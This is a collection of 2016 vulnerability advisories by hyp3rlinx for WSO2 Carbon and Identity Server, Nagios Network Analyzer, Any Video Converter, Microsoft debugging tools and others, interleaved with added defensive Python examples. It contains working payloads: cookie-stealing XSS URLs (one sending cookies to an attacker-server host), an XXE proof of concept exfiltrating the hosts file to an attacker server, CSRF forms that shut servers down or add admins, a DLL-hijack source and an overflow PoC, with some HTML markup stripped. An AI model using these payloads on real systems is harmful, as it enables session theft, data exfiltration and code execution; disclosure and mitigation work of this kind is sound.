http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-CSRF-DOS.txt

[+] ISR: ApparitionSec


Vendor:

www.wso2.com



Product:
==
WSO2 Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. 
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and 
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware 
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific 
features needed to solve a specific enterprise scenario.



Vulnerability Type:
=
Cross Site Request Forgery / DOS



CVE Reference:
==
CVE-2016-4315




Vulnerability Details:
=

The attack involves tricking a privileged user into initiating a request, by 
clicking a malicious link or visiting an evil webpage, to
shut down WSO2 servers.


References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101


The getSafeText() call and conditional logic below process the "action" 
parameter with no check for inbound CSRF attacks.

String cookie = (String) session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
String action = CharacterEncoder.getSafeText(request.getParameter("action"));
ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie, session);

try {
    if ("restart".equals(action)) {
        client.restart();
    } else if ("restartGracefully".equals(action)) {
        client.restartGracefully();
    } else if ("shutdown".equals(action)) {
        client.shutdown();
    } else if ("shutdownGracefully".equals(action)) {
        client.shutdownGracefully();
    }
} catch (Exception e) {
    response.sendError(500, e.getMessage());
    return;
}
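Both this advisory and the ntopng CSRF advisory earlier on this page show the same missing control: a state-changing handler that never ties the request to a token the browser could only have obtained from the legitimate page (ntopng accepted csrf=NOT-EVEN-CHECKED; Carbon dispatches on "action" with no token at all, and over GET). The following is an added example, not ntopng's or WSO2 Carbon's code, of the guard both were lacking: a per-session random token, a constant-time comparison that fails closed when the token is missing or arbitrary, and a refusal to perform the action over GET. The action names are the four from the Carbon snippet; the function names and the session dictionary are assumptions.

```python
# Added example, not ntopng's or WSO2 Carbon's code.  A CSRF guard for a
# state-changing admin handler: the token is issued per session, the
# request must be a POST, and the submitted token must be present and
# equal to the session's token (compared in constant time).
import hmac
import secrets
from typing import Dict, Optional, Tuple

# The actions the Carbon proxy_ajaxprocessor.jsp snippet dispatches on.
STATE_CHANGING_ACTIONS = frozenset(
    {"restart", "restartGracefully", "shutdown", "shutdownGracefully"})


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Create a fresh random token and bind it to the server-side session.
    The page embeds it in its forms; a cross-site page cannot read it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session: Dict[str, str], submitted: Optional[str]) -> bool:
    """True only if a token was issued, one was submitted, and they match.
    A missing token or an arbitrary value fails, unlike the checks the
    advisories describe."""
    expected = session.get("csrf_token")
    if expected is None or submitted is None:
        return False
    # compare_digest avoids leaking the match position through timing.
    return hmac.compare_digest(expected, submitted)


def handle_admin_action(session: Dict[str, str], method: str,
                        params: Dict[str, str]) -> Tuple[int, str]:
    """Stand-in for the server-admin handler.  Returns (status, message)."""
    if method != "POST":
        # Links and <img> tags can only produce GETs; never act on them.
        return 405, "state-changing actions must be POSTed"
    if not csrf_token_valid(session, params.get("csrf")):
        return 403, "missing or invalid CSRF token"
    action = params.get("action", "")
    if action not in STATE_CHANGING_ACTIONS:
        return 400, "unknown action"
    # Here the real handler would call client.shutdown() etc.
    return 200, f"{action} accepted"
```

Requiring POST on its own is not sufficient, since a cross-site form can POST; the token is what binds the request to the authenticated page. Setting the session cookie with SameSite=Lax or Strict adds a second, browser-enforced layer.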



Exploit code(s):
===
  
Shut down the Carbon server

https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown;>Shut
 it down!



Disclosure Timeline:
==
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX


WSO2 CARBON v4.4.5 PERSISTENT XSS COOKIE THEFT

2016-08-15 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-PERSISTENT-XSS-COOKIE-THEFT.txt

[+] ISR: ApparitionSec


Vendor:
=
www.wso2.com



Product:
==
WSO2 Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. 
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and 
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware 
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific 
features needed to solve a specific enterprise scenario.



Vulnerability Type:
===
Persistent / Reflected
Cross Site Scripting (XSS) - Cookie Disclosure



CVE Reference:
==
CVE-2016-4316



Vulnerability Details:
=

WSO2 Carbon has multiple XSS vectors allowing attackers to inject client-side 
scripts into web pages viewed by other users.
A cross-site scripting vulnerability may be used by attackers to bypass access 
controls such as the same-origin policy,
steal session cookies, and serve as a platform for further attacks on the 
system.
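Every payload in this advisory has the same shape: a value stored or reflected into an HTML attribute closes the attribute with "/> and then opens a new element. The following is an added example, not WSO2 Carbon's code, showing the raw interpolation beside attribute-context escaping, with a small parser-based check that makes the difference observable: the unescaped render yields two elements, the escaped one yields one. The field name and function names are assumptions.

```python
# Added example, not WSO2 Carbon's code.  Renders a user-supplied value into
# an HTML attribute with and without escaping, and counts the elements the
# browser-side parser would see, so the effect of the "/> payload is visible.
import html
from html.parser import HTMLParser
from typing import List


def render_input_unescaped(value: str) -> str:
    """The vulnerable pattern: raw string interpolation into an attribute."""
    return f'<input type="text" name="setName" value="{value}">'


def render_input_escaped(value: str) -> str:
    """Escape &, <, >, " and ' so the value cannot terminate the attribute
    (quote=True is required for attribute context)."""
    return f'<input type="text" name="setName" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag the parser encounters."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def element_names(fragment: str) -> List[str]:
    """Names of the elements a parser finds in the fragment, in order."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


# Constructed sample: the stored payload quoted in the advisory.
STORED_PAYLOAD = '"/><script>alert(document.cookie)</script>'
```

Escaping must match the context the value lands in; the onMouseMove variants in the advisory are still attribute-context injections, so the same escaping covers them, whereas a value placed inside a script block or a URL needs its own encoding.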


Exploit code(s)
===


Persistent XSS:

GET Request
https://victim-server:9443/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS="/>alert(document.cookie)
   


Request two is POST
/carbon/identity-mgt/challenges-mgt-finish.jsp

setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E==City+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=City+where+you+were+born+%3F=Father%27s+middle+name+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Father%27s+middle+name+%3F=Name+of+your+first+pet+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+your+first+pet+%3F=Favorite+sport+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Favorite+sport+%3F=Favorite+food+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+food+%3F=Favorite+vacation+location+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+vacation+location+%3F=Model+of+your+first+car+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Model+of+your+first+car+%3F=Name+of+the+hospital+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+the+hospital+where+you+were+born+%3F=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E=XSS


The XSS payload will then be listed at the URL below:

https://victim-server:9443/carbon/identity-mgt/challenges-set-mgt.jsp?region=region1=identity_security_questions_menu

Finally, when the victim clicks the "Delete" entry on the page, the XSS is executed.

Here is the stored payload from the HTML source:

Delete


///


Reflected XSS 

XSS #1 
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=9763=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E


XSS #2 
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?dsName=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=HELL


XSS #3
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?description=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=true


XSS #4
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E=victim-server=

XSS #5
https://victim-server:9443/carbon/viewflows/handlers.jsp?retainlastbc=true=in=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


XSS #6
https://victim-server:9443/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?=WSO2_CARBON_DB=com.mysql.jdbc.Driver=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E=root=RDBMS=RDBMS=default=undefined=undefined=undefined=false=true=



Disclosure Timeline:
===
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due c

WSO2 IDENTITY-SERVER v5.1.0 XML External-Entity

2016-08-15 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-IDENTITY-SERVER-v5.1.0-XML-External-Entity.txt

[+] ISR: ApparitionSec


Vendor:
=
www.wso2.com



Product:

Wso2 Identity Server v5.1.0

As the industry's first enterprise identity bus (EIB), WSO2 Identity Server is 
the central backbone
that connects and manages multiple identities across applications, APIs, the 
cloud, mobile, and Internet
of Things devices, regardless of the standards on which they are based. The 
multi-tenant WSO2 Identity Server
can be deployed directly on servers or in the cloud, and has the ability to 
propagate identities across geographical
and enterprise borders in a connected business environment.



Vulnerability Type:

XML External Entity / CSRF


CVE Reference(s):
===
CVE-2016-4312 (XXE)
CVE-2016-4311 (CSRF)


Vulnerability Details:
=


The WSO2IS XML parser is vulnerable to an XXE attack in the XACML flow; this can be 
exploited when XML input containing a reference to an
external entity is processed by a weakly configured XML parser. The attack 
leads to the disclosure and exfiltration of confidential
data and arbitrary system files, denial of service, server side request 
forgery, port scanning from the perspective of the machine
where the parser is located (localhost), and other system impacts.

The exploit can be carried out locally by an internal malicious user, or remotely 
via CSRF if an authenticated user clicks an attacker-
supplied link or visits an evil webpage. In the case of WSO2IS, system files can be 
read / exfiltrated to the remote attacker's server
for safe keeping -_- 
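The "weakly configured XML parser" above is one that still honours DOCTYPE declarations, since that is where an XXE payload declares the external entity it needs. The following is an added example, not WSO2's code, of the hardening a request handler can apply before the body reaches the real parser: refuse any document that carries a DOCTYPE. It is the same policy Java exposes as the disallow-doctype-decl feature, done here through expat's doctype callback so that an alternative encoding cannot hide the declaration from a byte-level search. The sample documents are constructed, with the attacker host name taken from the advisory.

```python
# Added example, not WSO2's code.  A pre-parse gate that refuses any XML
# document carrying a DOCTYPE, which an XXE payload needs in order to
# declare its external entities, before the document reaches the real
# parser.  Uses expat's doctype callback rather than a byte search so an
# encoding such as UTF-16 cannot hide the declaration.
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class DoctypeNotAllowed(ValueError):
    """Raised for documents that declare a DTD."""


def has_doctype(xml_bytes: bytes) -> bool:
    """Scan with expat and report whether a DOCTYPE declaration is present.
    Nothing is resolved: the scan aborts the moment the DOCTYPE starts."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeNotAllowed(f"DOCTYPE for <{name}> is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(xml_bytes, True)
    except DoctypeNotAllowed:
        return True
    except expat.ExpatError:
        return False  # malformed; the real parser will reject it anyway
    return False


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse an inbound request body only if it carries no DOCTYPE."""
    if has_doctype(xml_bytes):
        raise DoctypeNotAllowed("XML documents with a DOCTYPE are not accepted")
    return ET.fromstring(xml_bytes)


def is_accepted(xml_bytes: bytes) -> bool:
    """Convenience wrapper: True if the document would be parsed."""
    try:
        parse_untrusted(xml_bytes)
        return True
    except (DoctypeNotAllowed, ET.ParseError):
        return False


# Constructed samples: a benign request body and one shaped like the
# advisory's payload, referencing an external DTD on the attacker's host.
BENIGN_REQUEST = (b'<Request><Attributes Category="subject">'
                  b'<Attribute Id="id"/></Attributes></Request>')
XXE_REQUEST = (b'<?xml version="1.0"?>'
               b'<!DOCTYPE Request [<!ENTITY % dtd SYSTEM '
               b'"http://attackserver:8080/payload.dtd"> %dtd;]>'
               b'<Request>&send;</Request>')
# The same declaration in UTF-16 (BOM added by the codec), which a search
# for the ASCII bytes "<!DOCTYPE" would miss.
XXE_REQUEST_UTF16 = ('<!DOCTYPE Request SYSTEM "http://attackserver:8080/payload.dtd">'
                     '<Request/>').encode("utf-16")
```

Where a schema legitimately needs a DTD, the fallback is to keep the DOCTYPE but disable external general and parameter entities and set no entity resolver; rejecting DTDs outright is simpler to reason about and is the right default for an API that receives XACML requests from clients.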

References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0096



Exploit code(s):
===

XXE POC: exfiltrate the victim's Windows hosts file to our remote server.

1) Form for the XXE POST request.

https://victim-server:9443/carbon/entitlement/eval-policy-submit.jsp?withPDP=false;
 method="post"> 



http://attackserver:8080/payload.dtd;>
%dtd;]>







document.getElementById('XXE').submit()



2) DTD file on attacker server.


http://attackserver:8080?%file;'>">
%all;


3) On the attack server, create a listener for the victim's HTTP request.

python -m SimpleHTTPServer 8080
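The defender's counterpart to the XXE above, as an added example that is not WSO2's code: a parse-time guard over the stdlib expat bindings that reports every DOCTYPE, entity declaration and external entity reference in client-supplied XML, and a parser that refuses any document carrying a DTD before an entity can be processed. The attacker host is the one named in the PoC; the XACML request bodies are constructed samples.

```python
"""XXE guard: report and refuse DOCTYPE / entity declarations in client XML.

Added example, not WSO2 code. A XACML decision request from a client has no
legitimate need for a DTD, so the guard built here on the stdlib expat
bindings treats every DOCTYPE or entity declaration as an XXE indicator and
never resolves anything external. The attacker host is the one named in the
advisory; the XACML bodies are constructed samples.
"""
import xml.parsers.expat as expat


class DtdForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE."""


def xxe_indicators(data: bytes) -> list:
    """List every DOCTYPE, entity declaration and external entity reference seen.

    Parameter-entity expansion is disabled and external general entities are
    acknowledged but never fetched, so inspecting hostile input is safe.
    """
    findings = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append("DOCTYPE '%s' present (sysid=%r)" % (name, sysid))

    def on_entity_decl(name, is_pe, value, base, sysid, pubid, notation):
        kind = "parameter" if is_pe else "general"
        if sysid is not None:
            findings.append("%s entity '%s' SYSTEM %s" % (kind, name, sysid))
        else:
            findings.append("%s entity '%s' internal, %d chars" % (kind, name, len(value or "")))

    def on_external_ref(context, base, sysid, pubid):
        findings.append("external entity reference to %s" % sysid)
        return 1  # tell expat to continue without resolving it

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass  # a malformed body does not change what the prolog declared
    return findings


def parse_untrusted_root(data: bytes) -> str:
    """Parse client XML and return its root element name, rejecting any DTD up front."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdForbidden("DOCTYPE '%s' rejected before any entity was processed" % name)

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.Parse(data, True)
    return root[0]


# Constructed samples. The first mirrors the advisory's PoC: a parameter
# entity that pulls an attacker-hosted DTD. The second declares a general
# entity over the hosts file the advisory exfiltrates.
HOSTILE_PE = b"""<?xml version="1.0"?>
<!DOCTYPE Request [
  <!ENTITY % dtd SYSTEM "http://attackserver:8080/payload.dtd">
  %dtd;
]>
<Request/>"""

HOSTILE_GE = b"""<?xml version="1.0"?>
<!DOCTYPE Request [
  <!ENTITY file SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<Request>&file;</Request>"""

BENIGN = b"""<?xml version="1.0"?>
<Request xmlns="urn:oasis:names:tc:xacml:3.0:core:schema:wd-17"
         ReturnPolicyIdList="false" CombinedDecision="false">
  <Attributes Category="urn:oasis:names:tc:xacml:1.0:subject-category:access-subject"/>
</Request>"""

if __name__ == "__main__":
    for sample in (HOSTILE_PE, HOSTILE_GE, BENIGN):
        print(xxe_indicators(sample) or "clean")
    print("benign root:", parse_untrusted_root(BENIGN))
```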




Disclosure Timeline:

Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:
===
High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX


Nagios NA v2.2.1 XSS

2016-08-09 Thread hyp3rlinx
[+] Credits: John Page -HYP3RLINX   

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-XSS.txt

[+] ISR: ApparitionSec



Vendor:
===
www.nagios.com



Product:
==
Nagios Network Analyzer v2.2.1

Netflow Analysis, Monitoring, and Bandwidth Utilization Software

Network Analyzer provides an in-depth look at all network traffic sources and 
potential security threats allowing system
admins to quickly gather high-level information regarding the health of the 
network as well as highly granular data for
complete and thorough network analysis.




Vulnerability Type:
==
Cross Site Scripting (XSS)



CVE Reference:
==
N/A



Vulnerability Details:
=

Nagios NA has an XSS vector which enables attackers to inject client-side scripts 
into web pages viewed by other users. A cross-site scripting vulnerability may be 
used by attackers to bypass access controls such as the same-origin policy. The 
application seems to filter injection of "document.cookie"; however, we can bypass 
this by using document['cookie'] in its place.




Exploit code(s):
===


Steal Session Cookie

http://victim-server/nagiosna/index.php/sources/queries/1?q[begindate]=-24+hours[enddate]=-1+second[aggregate_csv]=[qid]=%27%27;window.open(%22http://attacker-server/c.php?c=%22%2bdocument[%27cookie%27])//




Disclosure Timeline:
==
Vendor Notification:  July 20, 2016
Vendor Acknowledgement: July 21, 2016
Vendor Fix / Release: August 1, 2016
August 8, 2016 : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

Low




HYP3RLINX


AirSnort v0.2.7 Stack Corruption DOS

2016-08-09 Thread hyp3rlinx
[+] Credits: Hyp3rlinx  

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AIRSNORT-STACK-CORRUPTION-DOS.txt

[+] ISR: ApparitionSec



Vendor:
==
sourceforge.net/projects/airsnort/


Product:
===
AirSnort v0.2.7

AirSnort is a wireless LAN (WLAN) tool which cracks encryption keys on 802.11b 
WEP networks. AirSnort operates
by passively monitoring transmissions, computing the encryption key when enough 
packets have been gathered.



Vulnerability Type:
===
Stack Corruption DOS




Vulnerability Details:
=

When opening / loading a corrupt 'crackfile' containing a bunch of 'A's... 
airsnort crashes and the stack is corrupted.
Under File / Load "Crack" File... open the corrupt crackfile with a bunch of 'A' 
chars, then BOOM...

Tested successfully on Linux OS.

GDB register dump

Program received signal SIGSEGV, Segmentation fault.
0xb72780e5 in __mempcpy_ia32 () from /lib/libc.so.6
(gdb) info r
eax            0x4141413b   1094795579
ecx            0x3e3995
edx            0x829e9d8    136964568
ebx            0xb73c1000   -1220800512
esp            0xbfffe1dc   0xbfffe1dc
ebp            0x0          0x0
esi            0xb67cf00a   -1233326070
edi            0x0          0
eip            0xb72780e5   0xb72780e5 <__mempcpy_ia32+21>
eflags         0x210203     [ CF IF RF ID ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51






HYP3RLINX


Any Video Converter DLL Hijack

2016-08-09 Thread hyp3rlinx
[+] Credits: HYP3RLINX 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ANY-VIDEO-CONVERTER-DLL-HIJACK.txt


[+] ISR: ApparitionSec



Vendor:
===
www.any-video-converter.com



Product:

AVCSoft / Any Video Converter v5.9.5

AVCFree.exe is a Video downloader and converter.



Vulnerability Type:

DLL Hijack



CVE Reference:
==
N/A



Vulnerability Details:
=


Vuln DLL: libx265_main10.dll

AVCFree.exe will search for and load any DLL named "libx265_main10.dll". If an 
attacker can place the DLL in a location where the victim opens a file in 
AVCFree, it will load and run the attacker's DLL and code.

In testing I noticed that if the file type is associated with AVCFree.exe as the 
default program to open with, then double clicking the file will load and 
execute the vuln DLL. If the file type is not associated with AVCFree, then 
right clicking and choosing to open with AVCFree will do the same.

Right click or double click and open in AVCFree.exe any of the following file 
types, then BOOM.

.mp4, .mp3, .mpg, .mpeg, .iso, .divx, .wav, .flv, .avs, .mov

and probably more...



Exploit code(s):
===

1) Save and compile the C code below as 'libx265_main10.c' to create the vuln DLL.

2) Place it on a remote share or in another directory such as "downloads".

3) Right click or double click an .mpg file (or any of the extensions listed 
above) to open it with AVCFree.exe, then BOOM!


#include <windows.h>

//gcc -c libx265_main10.c
//gcc -shared -o libx265_main10.dll libx265_main10.o

// Runs when the DLL is mapped into the process; the message box is the proof
// that AVCFree.exe loaded a DLL from a directory it should not trust.
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, "Arbitrary Code Exec", "PWNED!", MB_OK);
    break;
  }

  return TRUE; // keep the DLL loaded; returning FALSE makes the loader unload it
}



Disclosure Timeline:
===
Vendor Notification:  No Replies
August 8, 2016  : Public Disclosure





Severity Level:

Medium




HYP3RLINX


Nagios Network Analyzer v2.2.1 Multiple CSRF

2016-08-09 Thread hyp3rlinx
[+] Credits: John Page -hyp3rlinx   

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-MULTIPLE-CSRF.txt

[+] ISR: ApparitionSec



Vendor:
===
www.nagios.com



Product:
==
Nagios Network Analyzer v2.2.1

Netflow Analysis, Monitoring, and Bandwidth Utilization Software

Network Analyzer provides an in-depth look at all network traffic sources and 
potential security threats allowing system
admins to quickly gather high-level information regarding the health of the 
network as well as highly granular data for
complete and thorough network analysis.



Vulnerability Type:
=
Cross Site Request Forgery (CSRF)




CVE Reference:
==
N/A



Vulnerability Details:
=

Nagios NA has multiple CSRF vectors, allowing unauthorized commands to be 
transmitted from a user that the website trusts if that user is authenticated 
and visits a malicious webpage or clicks an attacker-supplied link. The Nagios 
system can be compromised, as remote attackers can create arbitrary commands, 
e.g. using "wget" to download RCE files onto the system, create arbitrary 
admins, delete users, and conduct DOS attacks.



Exploit code(s):


1) Create arbitrary commands 

http://victim-server/nagiosna/index.php/api/system/create_command; 
method="post">




document.forms[0].submit()
   


2) Add Admin 


http://victim-server/nagiosna/index.php/admin/users/create; 
method="post" accept-charset="utf-8">   
 


 



 



 
   


 

  
document.forms[0].submit()
 


3) Delete reports (report ID must be known or guessed)

http://victim-server/nagiosna/index.php/api/reports/delete; 
method="post">

document.forms[0].submit()
 

  
4) DOS

http://victim-server/nagiosna/index.php/api/system/stop; 
method="post">

//document.forms[0].submit()
 



  
5) Delete users (user ID must be known or guessed)

http://victim-server/nagiosna/index.php/admin/users/delete; 
method="post">

document.forms[0].submit()
   
  
 


Disclosure Timeline:
==
Vendor Notification:  July 20, 2016
Vendor Acknowledgement: July 21, 2016
Vendor Fix / Release: August 1, 2016
August 8, 2016 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
Medium





HYP3RLINX


Microsoft Process Kill Utility "kill.exe" Buffer Overflow

2016-07-08 Thread hyp3rlinx
[+] Credits: HYP3RLINX  

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec



Vendor:
=
www.microsoft.com



Product:
=
Microsoft Process Kill Utility "kill.exe"
File version: 6.3.9600.17298

The Kill tool (kill.exe) is a tool used to terminate a process; it is part of 
the WinDbg program.


Vulnerability Type:
===
Buffer Overflow


SEH Buffer Overflow @ about 512 bytes



Vulnerability Details:
=

Register dump


SEH chain of main thread
Address    SE handler
001AF688   kernel32.756F489B
001AFBD8   52525252
42424242   *** CORRUPT ENTRY ***


001BF81C   41414141
001BF820   41414141
001BF824   41414141
001BF828   41414141
001BF82C   41414141
001BF830   41414141
001BF834   909006EB   Pointer to next SEH record
001BF838   52525252   SE handler  <
001BF83C   90909090
001BF840   90909090



Exploit code(s):


Python POC.

import subprocess

# 508 bytes of filler is enough to reach and overwrite the SEH record
junk = "A" * 508 + ""

# path of the affected build (Windows Kits 8.1, x86 debuggers)
pgm = 'c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe'
subprocess.Popen([pgm, junk], shell=False)



Disclosure Timeline:
==
Vendor Notification: June 24, 2016
Vendor reply:  Will not security service
July 8, 2016  : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:

Low




HYP3RLINX


Microsoft WinDbg logviewer.exe Buffer Overflow DOS

2016-07-08 Thread hyp3rlinx
[+] Credits: HYP3RLINX  

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec



Vendor:
=
www.microsoft.com



Product:

WinDbg logviewer.exe

LogViewer (logviewer.exe), a tool that displays the logs created, is part of the 
WinDbg application.


Vulnerability Type:
===
Buffer Overflow DOS



Vulnerability Details:
=

Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv files. 
The app crashes, then the MMX registers etc. are overwritten... 
This utility belongs to Windows Kits/8.1/Debuggers/x86.

Read Access Violation / Memory Corruption
Win32 API Log Viewer
6.3.9600.17298
Windbg x86
logviewer.exe
Log Viewer 3.01 for x86


(5fb8.32fc): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
C:\Windows\syswow64\msvcrt.dll - 
eax=013dad30 ebx=005d ecx=0041 edx= esi=005d2000 edi=013dcd30
eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00210206
msvcrt!memmove+0x1ee:
754fa048 660f6f06movdqa  xmm0,xmmword ptr [esi] 
ds:002b:005d2000=



Exploit code(s):
===

1) Create a .lgv file with a bunch of 'A's, 4096 bytes long; opening it 
overwrites the XMM registers, ECX, etc.
2) Run logviewer.exe from the command line, piping the file to it, and watch it 
crash and burn.



Disclosure Timeline:
===
Vendor Notification: June 23, 2016
Vendor acknowledged: July 1, 2016
Vendor reply: Will not fix (stability issue)
July 8, 2016 : Public Disclosure



Severity Level:

Low




HYP3RLINX


WebCalendar v1.2.7 CSRF Protection Bypass

2016-07-04 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt

[+] ISR: ApparitionSec



Vendor:
==
www.k5n.us/webcalendar.php



Product:
==
WebCalendar v1.2.7

WebCalendar is a PHP-based calendar application that can be configured as a 
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, 
MS SQL Server, or ODBC is required.

